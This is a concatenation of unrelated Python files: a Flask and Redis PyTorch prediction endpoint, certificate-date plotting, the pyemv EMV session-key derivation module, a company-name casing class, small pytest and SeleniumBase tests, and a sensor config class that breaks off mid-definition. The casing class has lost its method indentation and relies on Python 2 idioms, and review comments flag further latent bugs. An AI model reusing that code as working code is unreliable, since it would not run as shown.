    if '.' not in filename:
        return False
    extension = filename.rsplit('.', 1)[1].lower()
    return extension in set(settings['data_stream']['allowed_extensions'])
def get_file_type(filename):
    """Return the lowercased extension of *filename*, or False when it has none."""
    if '.' not in filename:
        return False
    return filename.rsplit('.', 1)[1].lower()
# def get_device():
# return torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
def torchTensor_to_npArray(tensor):
    """Convert a torch tensor to a numpy array.

    Detaches the tensor from the autograd graph and moves it to the CPU
    first, which is required before ``.numpy()`` can be called.

    The leftover debug ``print`` statements (which dumped every intermediate
    tensor to stdout) have been removed.
    """
    with torch.no_grad():
        return tensor.detach().cpu().numpy()
def preprocessing(image):
    """Turn a PIL image into a normalized 1xCx224x224 tensor.

    Applies the standard ImageNet pipeline: resize to 256, center-crop to
    224, convert to tensor, normalize with the ImageNet channel statistics,
    then prepend the batch dimension.
    """
    pipeline = transforms.Compose([
        transforms.Resize(256),
        transforms.CenterCrop(224),
        transforms.ToTensor(),
        transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),
    ])
    batched = pipeline(image)
    batched.unsqueeze_(0)  # add the leading batch dimension in place
    return batched
@app.route("/predict", methods=["POST"])
def predict():
    """Accept an uploaded file, preprocess it, push it onto the Redis work
    queue for the model worker, then block-poll Redis until the prediction
    result keyed by a fresh UUID appears.

    Returns JSON: {"success": bool, "summary": <worker output, when set>}.
    """
    # device = get_device()
    data = {"success": False}
    if request.method == "POST":
        # Check if file in inputted
        if 'data' not in request.files:
            flash("No file part")
            raise ValueError("No file part")
        # print("METHOD: ", request.method)
        file = request.files['data']
        filetype = get_file_type(file.filename)
        if file.filename == '':
            flash("No selected file")
            raise ValueError("No selected file")
        # NOTE(review): if allowed_file() is False, `filename` stays unbound
        # but execution continues into the next branch - confirm intended.
        if file and allowed_file(file.filename):
            filename = secure_filename(file.filename)
        if request.files.get('data'):
            user_input = request.files["data"] #.read()
            # Only images are decoded; other file types pass through as-is.
            if (filetype in ['jpg', 'jpeg', 'png']):
                user_input = Image.open(user_input)
            else:
                pass
            preprocessed_input = preprocessing(user_input)
            # Get file properties
            if filetype in ['jpg', 'jpeg', 'png']:
                fileshape = np.array(preprocessed_input).shape
            else:
                fileshape = preprocessed_input.shape
            array_dtype = get_dtype(preprocessed_input)
            # HANDLE TORCH TENSORS
            # print("DTYPE: ", array_dtype)
            # if array_dtype == 'torch._':
            # print("TORCH!")
            # ### convert torch to numpy
            # output_np = torchTensor_to_npArray(output1)
            # C-contiguous copy so the raw buffer can be base64-encoded.
            preprocessed_input = preprocessed_input.numpy()
            preprocessed_input = preprocessed_input.copy(order="C")
            encoded_input = base64_encoding(preprocessed_input)
            # Fresh UUID ties this request to the worker's Redis reply key.
            k = str(uuid.uuid4())
            d = {
                "id": k,
                "filename": filename,
                "filetype": filetype,
                "shape": fileshape,
                "dtype": array_dtype,
                "data": encoded_input
            }
            rdb.rpush(settings['data_stream']['data_queue'], json.dumps(d))
            # Can i also send and receive torch tensors via redis?
            # or setup automated function to resore them from np array
            # Busy-wait (with sleep) until the worker writes the result back.
            while True:
                output = rdb.get(k)
                if output is not None:
                    output = output.decode("utf-8")
                    data["summary"] = json.loads(output)
                    rdb.delete(k)
                    break
                time.sleep(settings['data_stream']['client_sleep'])
            data["success"] = True
    return jsonify(data)
if __name__ == "__main__":
    # Entry point: start the Flask front-end that feeds the Redis queue.
    print((bcolor.BOLD + "* Loading PyTorch webserver... \n"
    "please wait until server has fully started" + bcolor.END))
    print("* Starting web service...")
    # Host/port/debug all come from config/settings.yaml.
    app.secret_key = settings['flask']['secret_key']
    app.run(
        host=settings['flask']['host'],
        port=int(settings['flask']['port']),
        debug=settings['flask']['debug']
    )
|
import os.path
# Load default settings first, then let a local settings.py override them.
# NOTE(review): execfile exists only in Python 2; under Python 3 this would
# need exec(open(path).read(), ...) - confirm the target interpreter.
for settings_name in ("default_settings.py", "settings.py"):
    settings_path = os.path.join(os.path.dirname(__file__), settings_name)
    if os.path.exists(settings_path):
        execfile(settings_path, globals(), locals())
|
import matplotlib.pyplot as plt
from glob import *
from datetime import datetime, date
from statistics import mode
#input: a list of filenames
#Return: nothing, but produces and save graphs
def produce_date_graphs(date_files):
    """Create and save issue/expiration date graphs for X.509 certificates.

    :param date_files: list of filenames containing "site:start:end" lines
    :return: None (figures are written by certificates_figure)
    """
    #Get the start dates and end dates from the files
    start_dates, end_dates = get_dates(date_files)
    #Defining earliest and latest dates to include in graphs
    earliest = date(2015,1,1)
    today = date.today()
    latest = date(2025,12,1)
    #Strip the lists for unwanted dates
    # NOTE(review): these loops rely on the lists being sorted (get_dates
    # returns them sorted) and leave a list *unchanged* when no element
    # passes the threshold - confirm that is intended before refactoring.
    for i in range(len(start_dates)):
        if start_dates[i] > earliest:
            start_dates = start_dates[i:]
            break
    for i in range(len(end_dates)):
        if end_dates[i] > today:
            end_dates = end_dates[i:]
            break
    for i in range(len(end_dates)):
        if end_dates[i] > latest:
            end_dates = end_dates[:i]
            break
    #Checking how many certificates issued / expired per month
    issued_monthly = monthly(start_dates)
    expires_monthly = monthly(end_dates, max_months = 40)
    #Category
    issued = 'Issue'
    expired = 'Expiration'
    #Important dates regarding Google announcements
    important_dates = [date(2016, 9, 1), date(2018, 2, 1)]
    #Generate the graphs
    certificates_figure(issued_monthly, start_dates[0], start_dates[-1], issued, important_dates)
    certificates_figure(expires_monthly, end_dates[0], end_dates[-1], expired, n = 3)
#Input: a list of filenames
#Return: two sorted lists of start dates and end dates
def get_dates(date_files):
    """Parse certificate date files into sorted start/end date lists.

    Each line of each file must look like ``website:YYYY-MM-DD:YYYY-MM-DD``.

    :param date_files: list of filenames to read
    :return: tuple (sorted start dates, sorted end dates)
    """
    #Create lists to store information
    start_dates = []
    end_dates = []
    #Read each file with certificate dates
    for file in date_files:
        # Context manager guarantees the handle is closed (the original
        # opened every file and never closed it).
        with open(file, 'r') as f:
            #Read each line in the file
            for line in f:
                #Split the information and add it to its respective lists
                (website,start,end) = line.strip().split(":")
                start_dates.append(datetime.strptime(start, '%Y-%m-%d').date())
                end_dates.append(datetime.strptime(end, '%Y-%m-%d').date())
    #Return the dates in sorted order
    return (sorted(start_dates), sorted(end_dates))
#Input: a list of dates and number max_months (optional)
#Return: a list with number of monthly occurences
def monthly(dates, max_months = 0):
    """Count how many dates fall in each month between the first and last date.

    :param dates: sorted list of datetime.date objects
    :param max_months: when > 0, truncate the result to this many months
    :return: list where index i counts dates in the i-th month after dates[0];
             an empty list when *dates* is empty (the original raised IndexError)
    """
    # Robustness fix: an empty input used to crash on dates[-1].
    if not dates:
        return []
    #Calculate the number of months between start date and end date
    months = (dates[-1].year - dates[0].year)*12 + (dates[-1].month - dates[0].month) + 1
    #Create a list to count monthly occurences
    monthly_stats = [0]*months
    #Run through all dates and count occurences
    for d in dates:
        index = (d.year - dates[0].year)*12 + (d.month - dates[0].month)
        monthly_stats[index] += 1
    #Strip the list if restricted number of months
    if max_months > 0:
        return monthly_stats[:max_months]
    else:
        return monthly_stats
#Input: a list l and a number n
#Return: lists of n top elements in l and their indexes
def n_largest(l, n):
    """Return the n largest values of *l* (descending) and their indexes.

    Only values strictly greater than 0 are ever reported (slots start at 0);
    ties keep the earliest index. Returns a tuple (values, indexes).
    """
    top = [0] * n
    ind = [0] * n
    for pos, value in enumerate(l):
        # First slot whose current value this element beats, or -1.
        slot = next((j for j in range(n) if value > top[j]), -1)
        if slot > -1:
            # Insert at the slot and drop the smallest entry off the end.
            top.insert(slot, value)
            top.pop()
            ind.insert(slot, pos)
            ind.pop()
    return (top, ind)
#Input: list of occurences per month, start date, end date, label and optional list of important dates and number n
#Return: nothing, but creates and saves graphs
def certificates_figure(monthly_stats, start, end, text, important_dates = [], n = 0):
    """Plot monthly certificate counts and save the figure as PDF and PNG.

    :param monthly_stats: list of per-month counts (from monthly())
    :param start: date of the first month on the x-axis
    :param end: date of the last month on the x-axis
    :param text: category label ('Issue' or 'Expiration') used in titles/filenames
    :param important_dates: dates to mark with vertical dashed lines
    :param n: when > 0, annotate the n most frequent months
    :return: None (writes figures\\plot-<text>.pdf/.png - Windows-style paths)
    """
    #Create new figure
    fig = plt.figure()
    #Set title for figure
    fig.suptitle(text + " dates for X.509 certificates", fontsize=15, fontweight='bold')
    #Add x-axis and y-axis to the figure
    ax = fig.add_subplot(111)
    ax.set_xlabel('Months from ' + str(start.strftime("%B %Y")) + " to " + str(end.strftime("%B %Y")),fontsize=12)
    ax.set_ylabel('Number of certificates',fontsize=12)
    #Add datapoints to the figure
    ax.plot([i for i in range(1,len(monthly_stats)+1)], monthly_stats)
    #Add top results to graph, depending on the size of n
    if n > 0:
        #Get top elements and indexes from the list
        top,ind = n_largest(monthly_stats, n)
        #Set higth to top element
        h = top[0]
        #Add text to label
        ax.text(len(monthly_stats) - 20, h, "Most frequent:", fontsize=15)
        #Run through all n top elements, optional
        for i in range(n):
            #Find the month of the given element
            (y, m) = divmod(start.month + ind[i], 12)
            d = date(start.year + y, m + 1, 1)
            #Print the month of the given element
            ax.text(len(monthly_stats) - 17, h*(1 - 0.1*(i+1)), "- " + str(d.strftime("%B %Y")) + ": " + str(top[i]), fontsize=15)
    #Check if there is any important dates to add to the figure
    if len(important_dates) > 0:
        for d in important_dates:
            #Find the month of the important date
            x = ((d.year - start.year)*12 + (d.month - start.month))
            #Find the top element and its index
            top,ind = n_largest(monthly_stats, 1)
            #Add name to the line of the important date
            ax.text(x - 2, top[0] - 50, d.strftime("%B %Y"), rotation = 'vertical', fontsize=12)
            #Add the line of the important date to the figure
            plt.axvline(x, color = 'k', linestyle = '--')
    #fig.show()
    #Save the figure as pdf and png
    fig.savefig("figures\\plot-" + text + ".pdf", dpi=150)
    fig.savefig("figures\\plot-" + text + ".png", dpi=150)
    #Close the figure
    plt.close(fig)
#Input: a list of dates, number of months (optional, set to 61)
#Return: nothing, but creates and saves graphs
def produce_length_graph(date_files, n = 61):
    """Plot the distribution of certificate validity lengths (in months).

    :param date_files: list of filenames containing "site:start:end" lines
    :param n: number of months to include on the x-axis (default 61)
    :return: None (writes figures\\certificate_lengths.pdf/.png)
    """
    lengths = []
    #Run through all files in the list
    for file in date_files:
        # Context manager guarantees the handle is closed (the original
        # opened every file and never closed it).
        with open(file, 'r') as f:
            #Run through all lines in the file
            for line in f:
                #Split the information, calculate the length and add it to the lists
                (website,start,end) = line.strip().split(":")
                s = datetime.strptime(start, '%Y-%m-%d').date()
                e = datetime.strptime(end, '%Y-%m-%d').date()
                lengths.append((e.year - s.year)*12 + (e.month - s.month))
    #Create a list to store the data
    occurrences = [0]*max(lengths)
    #Count the occurences of all lengths
    for l in lengths:
        occurrences[l-1] += 1
    #Strip the list for dates beyond n months
    occurrences = occurrences[:n]
    #Create new figure
    fig = plt.figure()
    #Add title to figure
    fig.suptitle("SSL/TLS Certificate Validity", fontsize = 15, fontweight = 'bold')
    #Add x-axis and y-axis to figure
    ax = fig.add_subplot(111)
    ax.set_xlabel('Number of months the certificate is valid',fontsize=12)
    ax.set_ylabel('Number of certificates valid in $X$ months',fontsize=12)
    #Add datapoints to the figure
    ax.plot([i for i in range(1,len(occurrences)+1)], occurrences)
    #Add the mode to the figure
    ax.text(0.7 * len(occurrences), max(occurrences)*0.9, "Mode: " + str(mode(lengths)) + " months", fontsize = 12)
    #fig.show()
    #Save the figure as pdf and png
    fig.savefig("figures\\certificate_lengths.pdf", dpi=150)
    fig.savefig("figures\\certificate_lengths.png", dpi=150)
    #Close the figure
    plt.close(fig)
|
r"""Cryptographic key derivation functions for the ICC Master Keys and ICC Session Keys.
ICC Master Key derivation method A:
>>> import pyemv
>>> iss_mk = bytes.fromhex('0123456789ABCDEFFEDCBA9876543210')
>>> pan = '99012345678901234'
>>> psn = '45'
>>> icc_mk = pyemv.kd.derive_icc_mk_a(iss_mk, pan, psn)
>>> icc_mk.hex().upper()
'67F8292358083E5EA7AB7FDA58D53B6B'
"""
import binascii as _binascii
import hashlib as _hashlib
import typing as _typing
from pyemv import tools as _tools
__all__ = [
"derive_icc_mk_a",
"derive_icc_mk_b",
"derive_common_sk",
"derive_visa_sm_sk",
"derive_emv2000_tree_sk",
]
def derive_icc_mk_a(
    iss_mk: bytes,
    pan: _typing.Union[bytes, str],
    psn: _typing.Optional[_typing.Union[bytes, str]] = None,
) -> bytes:
    r"""ICC Master Key Derivation. EMV Option A.

    Diversifies the Issuer Master Key with the PAN and PAN Sequence
    Number via Triple DES, as defined in EMV 4.3 Book 2,
    Annex A 1.4.1 (Option A).

    Parameters
    ----------
    iss_mk : bytes
        Binary Issuer Master Key to derive ICC Master Key from.
        Has to be a valid DES key.
    pan : bytes or str
        ASCII Application Primary Account Number.
    psn : bytes or str, optional
        ASCII 2-digit PAN Sequence Number (default 00).

    Returns
    -------
    icc_mk : bytes
        Binary 16-byte ICC Master Key.

    Examples
    --------
    >>> from pyemv import kd
    >>> iss_mk = bytes.fromhex("0123456789ABCDEFFEDCBA9876543210")
    >>> icc_mk = kd.derive_icc_mk_a(iss_mk, pan="12345678901234567", psn="01")
    >>> icc_mk.hex().upper()
    '73AD54688CEF2934B0979857E3C719F1'
    """
    pan_text = pan.decode("ascii") if isinstance(pan, bytes) else pan
    if psn is None:
        psn_text = "00"
    elif isinstance(psn, bytes):
        psn_text = psn.decode("ascii")
    else:
        psn_text = psn
    # Data A: last 16 digits of PAN || PSN, zero-padded on the left.
    data_a = _binascii.a2b_hex((pan_text + psn_text)[-16:].zfill(16))
    # Data B: the ones' complement of data A.
    data_b = _tools.xor(data_a, b"\xFF" * len(data_a))
    return _tools.adjust_key_parity(_tools.encrypt_tdes_ecb(iss_mk, data_a + data_b))
def derive_icc_mk_b(
    iss_mk: bytes,
    pan: _typing.Union[bytes, str],
    psn: _typing.Optional[_typing.Union[bytes, str]] = None,
) -> bytes:
    r"""ICC Master Key Derivation. EMV Option B.

    Diversifies the Issuer Master Key with a SHA-1 hash of the PAN and PAN
    Sequence Number, decimalised to 16 digits, as defined in EMV 4.3 Book 2,
    Annex A 1.4.2 (Option B). For PANs of 16 digits or fewer the method is
    identical to Option A.

    Parameters
    ----------
    iss_mk : bytes
        Binary Issuer Master Key to derive ICC Master Key from.
        Has to be a valid DES key.
    pan : bytes or str
        ASCII Application Primary Account Number.
    psn : bytes or str, optional
        ASCII 2-digit PAN Sequence Number (default 00).

    Returns
    -------
    icc_mk : bytes
        Binary 16-byte ICC Master Key

    Examples
    --------
    >>> from pyemv import kd
    >>> iss_mk = bytes.fromhex("0123456789ABCDEFFEDCBA9876543210")
    >>> icc_mk = kd.derive_icc_mk_b(iss_mk, pan="12345678901234567", psn="01")
    >>> icc_mk.hex().upper()
    'AD406D7F6D7570916D75E5DCAB8CF737'
    """
    # Option B degenerates to Option A for short PANs.
    if len(pan) <= 16:
        return derive_icc_mk_a(iss_mk, pan, psn)
    psn = "00" if psn is None else psn
    if isinstance(psn, bytes):
        psn = psn.decode("ascii")
    if isinstance(pan, bytes):
        pan = pan.decode("ascii")
    # PAN || PSN must hold an even number of digits before hex-packing;
    # left-pad with a single zero when the PAN length is odd.
    if len(pan) % 2:
        pan_psn = _binascii.a2b_hex("0" + pan + psn)
    else:
        pan_psn = _binascii.a2b_hex(pan + psn)
    digest = _hashlib.sha1(pan_psn).hexdigest()
    # Keep the first 16 decimal digits found in the hash.
    result = "".join(c for c in digest if c in "0123456789")[:16]
    # If fewer than 16 exist, decimalise hex letters via the EMV table
    # a->0, b->1, c->2, d->3, e->4, f->5 (ord offset from 'a').
    if len(result) < 16:
        letters = [c for c in digest if c in "abcdef"][: 16 - len(result)]
        result += "".join(str(ord(c) - ord("a")) for c in letters)
    data_a = _binascii.a2b_hex(result)
    # Data B is the ones' complement of data A.
    data_b = _tools.xor(data_a, b"\xFF" * len(data_a))
    return _tools.adjust_key_parity(_tools.encrypt_tdes_ecb(iss_mk, data_a + data_b))
def derive_common_sk(icc_mk: bytes, r: _typing.Union[bytes, bytearray]) -> bytes:
    r"""EMV Common Session Key Derivation.

    Derives a 16-byte session key from the ICC Master Key and an 8-byte
    diversification value, per EMV 4.3 Book 2, Annex A 1.3.1: the third
    byte of the diversifier is forced to F0 for the left half and 0F for
    the right half before Triple DES encryption.

    Parameters
    ----------
    icc_mk : bytes
        Binary ICC Master Key to derive session key from.
        Has to be a valid DES key.
    r : bytes, bytearray
        Binary 8-byte diversification value (e.g. ATC padded with zeros,
        an ARQC, or a proprietary value).

    Returns
    -------
    sk : bytes
        Binary 16-byte Session Key.

    Raises
    ------
    ValueError
        ICC Master Key must be a double length DES key
    ValueError
        Diversification value must be 8 bytes long

    Examples
    --------
    >>> from pyemv import kd
    >>> mk = bytes.fromhex("0123456789ABCDEFFEDCBA9876543210")
    >>> r = bytes.fromhex("001C000000000000")
    >>> sk = kd.derive_common_sk(mk, r)
    >>> sk.hex().upper()
    'E9FB384AF807B940FEDCEA613461B0C4'
    """
    if len(icc_mk) != 16:
        raise ValueError("ICC Master Key must be a double length DES key")
    if len(r) != 8:
        raise ValueError("Diversification value must be 8 bytes long")
    diversifier = bytes(r)
    # Left half: byte 2 forced to F0; right half: byte 2 forced to 0F.
    half_a = diversifier[:2] + b"\xF0" + diversifier[3:]
    half_b = diversifier[:2] + b"\x0F" + diversifier[3:]
    sk = _tools.encrypt_tdes_ecb(icc_mk, half_a + half_b)
    return _tools.adjust_key_parity(sk)
def derive_visa_sm_sk(icc_mk: bytes, atc: bytes) -> bytes:
    r"""Visa Secure Messaging Session Key Derivation.

    XORs the ATC (left half) and the inverted ATC (right half), each
    zero-padded to 8 bytes, onto the two halves of the ICC Master Key.

    Parameters
    ----------
    icc_mk : bytes
        Binary ICC Master Key to derive session key from.
        Has to be a valid DES key.
    atc : bytes
        Binary data from tag 9F36 (Application Transaction Counter).

    Returns
    -------
    sk : bytes
        Binary 16-byte Session Key.

    Raises
    ------
    ValueError
        ICC Master Key must be a double length DES key
    ValueError
        ATC value must be 2 bytes long

    Examples
    --------
    >>> from pyemv import kd
    >>> mk = bytes.fromhex("0123456789ABCDEFFEDCBA9876543210")
    >>> atc = bytes.fromhex("001C")
    >>> sk = kd.derive_visa_sm_sk(mk, atc)
    >>> sk.hex().upper()
    '0123456789ABCDF2FEDCBA987654CDF2'
    """
    if len(icc_mk) != 16:
        raise ValueError("ICC Master Key must be a double length DES key")
    if len(atc) != 2:
        raise ValueError("ATC value must be 2 bytes long")
    pad = b"\x00" * 6
    # SK Key A = (00..00 || ATC) xor MK Key A
    left = _tools.xor(pad + atc, icc_mk[:8])
    # SK Key B = (00..00 || ~ATC) xor MK Key B
    inverted_atc = _tools.xor(atc, b"\xff\xff")
    right = _tools.xor(pad + inverted_atc, icc_mk[8:])
    return _tools.adjust_key_parity(left + right)
def derive_emv2000_tree_sk(
    icc_mk: bytes,
    atc: bytes,
    height: int = 8,
    branch_factor: int = 4,
    iv: bytes = b"\x00" * 16,
) -> bytes:
    r"""EMV2000-Tree Session Key Derivation.

    Parameters
    ----------
    icc_mk : bytes
        Binary ICC Master Key to derive session key from.
        Has to be a valid DES key.
    atc : bytes
        Binary data from tag 9F36 (Application Transaction Counter).
    height : int
        Height value used for EMV-Tree derivation. Height controls
        the number of levels of intermediate keys in the tree
        excluding the base level. Set to either 8 or 16.
        The specification recommends value 8. Defaults to 8.
    branch_factor : int
        Branch factor value used for EMV-Tree derivation. Branch factor
        controls number of "child" keys a "parent" key derives.
        The specification recommends value 4. Defaults to 4.
    iv : bytes
        16-byte binary initialization vector used for EMV-Tree derivation.
        The specification recommends IV value of zeros. Defaults to 0s.

    Returns
    -------
    sk : bytes
        Binary 16-byte Session Key.

    Raises
    ------
    ValueError
        ICC Master Key must be a double length DES key
    ValueError
        ATC value must be 2 bytes long
    ValueError
        Initialization vector value must be 16 bytes long
    ValueError
        Number of possible session keys must exceed maximum ATC value

    Notes
    -----
    For more information see:
        - EMV 4.1 Book 2 Annex A 1.3 Session Key Derivation
        - EMV 4.1 Book 2 Annex A 1.3.1 Description
        - EMV 4.1 Book 2 Annex A 1.3.2 Implementation

    This method was replaced by common session key derivation in 2005
    and should not be used for new development.
    See EMVCo specification update bulletin 46 (SU-46).

    Recommended branch factor and tree height combinations are as follow.
    Both combinations produce enough session keys for every possible ATC value.
        - Branch factor 2 and tree height 16
        - Branch factor 4 and tree height 8

    Examples
    --------
    >>> from pyemv import kd
    >>> mk = bytes.fromhex("0123456789ABCDEFFEDCBA9876543210")
    >>> atc = bytes.fromhex("001C")
    >>> sk = kd.derive_emv2000_tree_sk(mk, atc, 8, 4)
    >>> sk.hex().upper()
    'E5BF6D1067F194B0A89B7F5D83BC64A2'
    """
    if len(icc_mk) != 16:
        raise ValueError("ICC Master Key must be a double length DES key")
    if len(atc) != 2:
        raise ValueError("ATC value must be 2 bytes long")
    if len(iv) != 16:
        raise ValueError("Initialization vector value must be 16 bytes long")
    # The number of possible session keys (branch_factor ** height)
    # must exceed the maximum value of the ATC which is 2 ** 16 - 1.
    if branch_factor ** height < 65535:
        raise ValueError(
            "Number of possible session keys must exceed maximum ATC value"
        )
    # F(X,Y,j) := (DES3(X)[YL XOR (j mod b)] || DES3(X)[YR XOR (j mod b) XOR 'F0'])
    def derive(x: bytes, y: bytes, j: int) -> bytes:
        """Map two 16-byte numbers X and Y and an integer j onto a 16-byte number."""
        j_mod_b = int.to_bytes(j % branch_factor, 8, "big")
        # (DES3(X)[YL XOR (j mod b)]
        l_data = _tools.xor(y[:8], j_mod_b)
        l_data = _tools.encrypt_tdes_ecb(x, l_data)
        # DES3(X)[YR XOR (j mod b) XOR 'F0']
        r_data = _tools.xor(y[8:], j_mod_b)
        r_data = _tools.xor(r_data, b"\x00" * 7 + b"\xF0")
        r_data = _tools.encrypt_tdes_ecb(x, r_data)
        return l_data + r_data
    # GP = Grandparent Key
    # IK = Intermediate Key
    # P = Parent Key
    # H = Height of the tree
    def walk(j: int, h: int) -> _typing.Tuple[bytes, bytes]:
        """Returns P and GP.

        Recurses from the requested level back up to the root; each
        level derives its key from the (parent, grandparent) pair of
        the level above.
        """
        # Base case: P = ICC MK, GP = IV
        if h == 0:
            return icc_mk, iv
        p, gp = walk(j // branch_factor, h - 1)
        # Derives an IK from P and GP
        # IK becomes the new parent and current P becomes the new GP
        return derive(p, gp, j), p
    atc_num = int.from_bytes(atc, "big")
    # Derive IKs from the bottom of the tree to the second to last level
    # because GP from that level is required for SK.
    p, gp = walk(atc_num // branch_factor, height - 1)
    # Derive SK from a new IK at the tree height XOR'd by GP.
    sk = _tools.xor(derive(p, gp, atc_num), gp)
    return _tools.adjust_key_parity(sk)
|
# coding=utf-8
import codecs
import os
from collections import Counter
class CompanyCase:
    def __init__(self, language='en', ngram_length=2):
        """Build character n-gram transition statistics from the bundled word list.

        :param language: word-list name under ``wordlists/`` (e.g. ``'en'``)
        :param ngram_length: size of the character n-grams used for scoring
        """
        self.ngram_length = ngram_length
        self.transitions = self.fetch_all_transitions(language, ngram_length)
        self.norm_transitions = self.normalize_transitions(self.transitions)
        # While most sensible parameters will capitalize the acronyms, forcing them here
        # to make sure they don't get title cased for whatever set of parameters.
        self.force_case = ['of', 'and', 'IT', 'PLC', 'LLC', 'Ltd', 'LLP']
def find_ngrams(self, input_list, n):
""" Returns a list of n-grams """
return map(lambda x: ''.join(x), zip(*[input_list[i:] for i in range(n)]))
def fetch_all_transitions(self, language, ngram_length):
""" Generate a dict of counts for transitions for all n-grams in the language word list """
wordlist = os.path.join(os.path.dirname(__file__), "wordlists/{0}.txt".format(language))
if not os.path.exists(wordlist):
raise SystemError("Language '{0}' does not exist".format(language))
all_grams = []
with codecs.open(wordlist, 'r', encoding='utf-8') as f:
for line in f:
words = line.strip('\n').lower().split()
ngrams = reduce(lambda x, y: x + y, map(lambda word: self.find_ngrams(word, ngram_length), words))
all_grams += ngrams
return dict(Counter(all_grams))
def normalize_transitions(self, t):
total = float(reduce(lambda x, y: x + y, t.values()))
return dict([(x, y/total) for x, y in t.iteritems()])
def force_case_for_words(self, l):
"""
Add additional words to force case for
:param l: a list of words to force the case for
:return: None
"""
self.force_case += l
def score_word(self, word):
""" Returns the mean transition likelihood score for the word """
ngrams = self.find_ngrams(word.lower(), self.ngram_length)
if len(ngrams) < 1:
return 0.0
return sum(map(lambda x: self.norm_transitions.get(x, 0), ngrams)) / len(ngrams)
def apply(self, company_name, threshold=0.001):
"""
Applies the case transformation on the given string
:param company_name: string representing company name
:param threshold: the transition score threshold to identify abbreviations
:return: a string containing words with fixed case
"""
if type(company_name) == unicode:
company_name = company_name.encode('utf-8')
fixed_name = []
for word in company_name.split():
fixed_word = None
# Check if the word is to be force cased
for x in self.force_case:
if x.lower() == word.lower():
fixed_word = x
break
if not fixed_word:
# Title case if dictionary word-like
# else, Upper case
score = self.score_word(word)
if score < threshold:
fixed_word = word.decode('utf-8').upper()
else:
fixed_word = word.decode('utf-8').title()
# Clean up any trailing 'S
if fixed_word.endswith("'S"):
fixed_word = fixed_word[:-1]+'s'
fixed_name.append(fixed_word)
return ' '.join(fixed_name)
|
import pytest
from ..http_status import HttpStatusBase
from ..mock_data import MockDataHandler
md_handler = MockDataHandler()
@pytest.mark.integration
@pytest.mark.mockdata
@pytest.mark.response
class TestMockDataResponseFormat(HttpStatusBase):
    """Verify endpoint responses match stored mock data in every format."""
    @pytest.mark.parametrize("frmt", ["", "json", "jsonl", "ttl"])
    @pytest.mark.parametrize("endp_req", [
        "/resources/1358199159",
    ])
    def test_mock_format(self, endp_req, frmt, overwrite_mock_output):
        """Fetch a resource in the requested format and compare to mock data."""
        if frmt:
            res = self._http_response(endp_req, get_param={"format": frmt})
            fname = "{}{}-{}".format(type(self).__name__, endp_req, frmt)
        else:
            # An empty format means the server default, which is JSON.
            frmt = "json"
            res = self._http_response(endp_req)
            fname = "{}{}".format(type(self).__name__, endp_req)
        # Optionally refresh the stored mock output before comparing.
        if overwrite_mock_output:
            md_handler.write(fname, res.text, format=frmt)
        md_handler.compare(fname, res.text, format=frmt)
# Allow running this test module directly, outside the pytest CLI.
if __name__ == '__main__':
    pytest.main()
|
import pytest
from seleniumbase import BaseCase
from qa327.models import db, User
from qa327_test.conftest import base_url
from unittest.mock import patch
from werkzeug.security import generate_password_hash, check_password_hash
# Mock user returned by the patched qa327.backend.get_user in the tests below.
test_user = User(
    email='test_frontend@test.com',
    name='testuser',
    password=generate_password_hash('test_frontendA1$')
)
class R7TestPost(BaseCase):
    """R7: logging out invalidates the session and blocks restricted pages."""
    # Logout will invalidate the current session and redirect to
    # the login page. After logout the user should not be able to
    # access restricted pages
    @patch('qa327.backend.get_user', return_value=test_user)
    def test_r1_post_1(self, *_):
        """Log out, then verify '/' still redirects back to the login page."""
        # logout
        self.open(base_url + '/logout')
        # check if we are on the login page now
        self.assert_text("Please Login")
        # try to go to /
        self.open(base_url)
        # validate that we are still on the login page
        self.assert_text("Please Login")
|
from icemet_sensor import homedir, datadir
from icemet.cfg import Config, ConfigException
from icemet.pkg import name2ext
import os
import shutil
default_file = os.path.join(datadir, "icemet-sensor.yaml")
def create_config_file(dst):
	"""Copy the bundled default configuration file to ``dst``.

	Any missing parent directories are created first. A bare file name
	(no directory component) is handled too; previously that case crashed
	because ``os.makedirs("")`` raises FileNotFoundError.

	:param dst: destination path for the new configuration file.
	"""
	dst_dir = os.path.dirname(dst)
	if dst_dir:
		os.makedirs(dst_dir, exist_ok=True)
	shutil.copy(default_file, dst)
class SensorConfig(Config):
	"""Sensor configuration parsed from the icemet-sensor YAML file.

	Each YAML section is exposed as a dynamically created parameter object
	with plain attributes (e.g. ``cfg.save.dir``, ``cfg.meas.burst_fps``).
	"""
	def set_dict(self, dict):
		"""Populate the parameter objects from the raw configuration dict.

		NOTE(review): the parameter name shadows the ``dict`` builtin; kept
		as-is for compatibility with Config.set_dict.
		"""
		super().set_dict(dict)
		# Save parameters: output directory, file type and package handling.
		self.save = type("SaveParam", (object,), {
			"dir": os.path.expanduser(os.path.normpath(dict["save"]["dir"])),
			"type": dict["save"]["type"],
			"is_pkg": False,
			"ext": None,
			"tmp": None
		})
		# A recognised package type implies packaged output; otherwise the
		# save type itself doubles as the file extension.
		ext = name2ext(self.save.type)
		self.save.is_pkg = bool(ext)
		self.save.ext = ext if ext else "."+self.save.type
		self.save.tmp = os.path.join(self.save.dir, "tmp" + self.save.ext)
		# Measurement timing; burst_delay is derived from burst_fps.
		self.meas = type("MeasureParam", (object,), {
			"burst_fps": float(dict["measurement"]["burst_fps"]),
			"burst_delay": 1.0 / float(dict["measurement"]["burst_fps"]),
			"burst_len": int(dict["measurement"]["burst_len"]),
			"wait": float(dict["measurement"]["wait"]),
		})
		# Sensor id is given as a hexadecimal string in the config.
		self.sensor = type("SensorParam", (object,), {
			"id": int(dict["sensor"]["id"], 16)
		})
		# Devices are {name: kwargs} mappings turned into creation params.
		self.camera = self._creatable(dict["camera"], "CameraParam")
		self.laser = self._creatable(dict["laser"], "LaserParam")
		# The temperature relay section is optional.
		self.temp_relay = None
		if dict["temp_relay"]:
			self.temp_relay = self._creatable(dict["temp_relay"], "TempRelayParam")
		# FTP upload parameters.
		self.ftp = type("FTPParam", (object,), {
			"enable": dict["ftp"]["enable"],
			"host": dict["ftp"]["host"],
			"port": int(dict["ftp"]["port"]),
			"user": dict["ftp"]["user"],
			"passwd": dict["ftp"]["passwd"],
			"path": os.path.normpath(dict["ftp"]["path"])
		})
		# Preprocessing: crop window, rotation, empty-image thresholds and
		# background subtraction stack length.
		self.preproc = type("PreprocParam", (object,), {
			"enable": dict["preproc"]["enable"],
			"crop": type("CropParam", (object,), {
				"x": int(dict["preproc"]["crop"]["x"]),
				"y": int(dict["preproc"]["crop"]["y"]),
